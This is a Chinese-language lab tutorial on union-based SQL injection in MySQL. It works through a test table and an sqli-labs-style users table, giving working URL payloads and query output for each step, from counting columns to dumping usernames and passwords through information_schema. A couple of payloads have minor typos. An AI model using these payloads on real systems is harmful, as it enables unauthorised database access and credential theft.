0x00 概要

在页面有显示位的情况下使用

0x01 测试表数据

  1. # 测试表数据: test;
  3. mysql>  select * from test;
  4. +----+------+-----+---------+
  5. | id | test | map | content |
  6. +----+------+-----+---------+
  7. |  1 | 1    | 1   | 1       |
  8. |  2 | 2    | 2   | 2       |
  9. |  3 | 3    | 3   | 3       |
  10. +----+------+-----+---------+
  11. 3 rows in set (0.00 sec)
  1. # 测试管理表: users;
  3. mysql> select * from users;
  4. +----+----------+------------+
  5. | id | username | password   |
  6. +----+----------+------------+
  7. |  1 | Dumb     | Dumb       |
  8. |  2 | Angelina | I-kill-you |
  9. |  3 | Dummy    | p@ssword   |
  10. |  4 | secure   | crappy     |
  11. |  5 | stupid   | stupidity  |
  12. |  6 | superman | genious    |
  13. |  7 | batman   | mob!le     |
  14. |  8 | admin    | admin      |
  15. |  9 | admin1   | admin1     |
  16. | 10 | admin2   | admin2     |
  17. | 11 | admin3   | admin3     |
  18. | 12 | dhakkan  | dumbo      |
  19. | 14 | admin4   | admin4     |
  20. +----+----------+------------+
  21. 13 rows in set (0.00 sec)

0x02 查看列数

web语句: http://www.test.com/sql.php?id=1 order by 4

数据库语句: select * from test where id=1 order by 4

0x03 爆数据库版本

web语句: http://www.test.com/sql.php?id=-1 union select 1, @@VERSION, 3, 4

数据库语句: select * from test where id=-1 union select 1, @@VERSION, 3, 4

  1. mysql> select * from test where id=-1 union select 1, @@VERSION, 3, 4;
  2. +----+--------+------+---------+
  3. | id | test   | map  | content |
  4. +----+--------+------+---------+
  5. |  1 | 5.5.53 | 3    | 4       |
  6. +----+--------+------+---------+
  7. 1 row in set (0.00 sec)

0x04 爆当前连接用户

web语句: http://www.test.com/sql.php?id -1 union select 1, user(), 3, 4

数据库语句: select * from test where id=-1 union select 1, user(), 3, 4;

  1. mysql> select * from test where id=-1 union select 1, user(), 3, 4;
  2. +----+----------------+------+---------+
  3. | id | test           | map  | content |
  4. +----+----------------+------+---------+
  5. |  1 | root@localhost | 3    | 4       |
  6. +----+----------------+------+---------+
  7. 1 row in set (0.00 sec)

0x05 爆当前连接的数据库

web语句: http://www.test.com/sql.php?id=-1 union select 1, database(), 3,

数据库语句: select * from test where id=-1 union select 1, database(), 3, 4;

  1. mysql> select * from test where id=-1 union select 1, database(), 3, 4;
  2. +----+------+------+---------+
  3. | id | test | map  | content |
  4. +----+------+------+---------+
  5. |  1 | test | 3    | 4       |
  6. +----+------+------+---------+
  7. 1 row in set (0.00 sec)

0x06 爆库名

注意: LIMIT 0 修改会显示其他库名
例如:
修改为0 就是出1库
修改为1 就是出2库

web语句: http://www.test.com/sql.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1

数据库语句: select * from test where id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1

  1. mysql> select * from test where id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1;
  2. +----+-------+------+---------+
  3. | id | test  | map  | content |
  4. +----+-------+------+---------+
  5. |  1 | 74cms | 3    | 4       |
  6. +----+-------+------+---------+
  7. 1 row in set (0.00 sec)

0x07 爆表名

注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据

web语句: http://www.test.com/sql.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;

数据库语句: select * from test where id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;

  1. mysql> select * from test where id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;
  2. +----+-----------+------+---------+
  3. | id | test      | map  | content |
  4. +----+-----------+------+---------+
  5. |  1 | tdb_admin | 3    | 4       |
  6. +----+-----------+------+---------+
  7. 1 row in set (0.00 sec)

0x08 暴字段

table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名

limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password

web语句: http://www.test.com/sql.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name=’users’ limit 1,1;

数据库语句: select * from test where id = -1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name=’users’ limit 1,1;

  1. mysql> select * from test where id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1,1;
  2. mysql> select * from test where id = -1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='users' limit 1,1;
  3. +----+----------+-----+---------+
  4. | id | test     | map | content |
  5. +----+----------+-----+---------+
  6. |  1 | username | 3   | 4       |
  7. +----+----------+-----+---------+
  8. 1 row in set (0.01 sec)

0x09 爆内容

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

web语句: http://www.test.com/sql.php?id=-1 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4 from test.tdb_admin limit 0,1

数据库语句: select * from test where id=-1 union select 1,concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e),3,4 from 库名.表名 limit 0,1;

  1. mysql> select * from test where id=-1 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4 from security.users limit 0,1;
  2. +----+---------------+-----+---------+
  3. | id | test          | map | content |
  4. +----+---------------+-----+---------+
  5. |  1 | ~1:Dumb:Dumb~ | 3   | 4       |
  6. +----+---------------+-----+---------+
  7. 1 row in set (0.00 sec)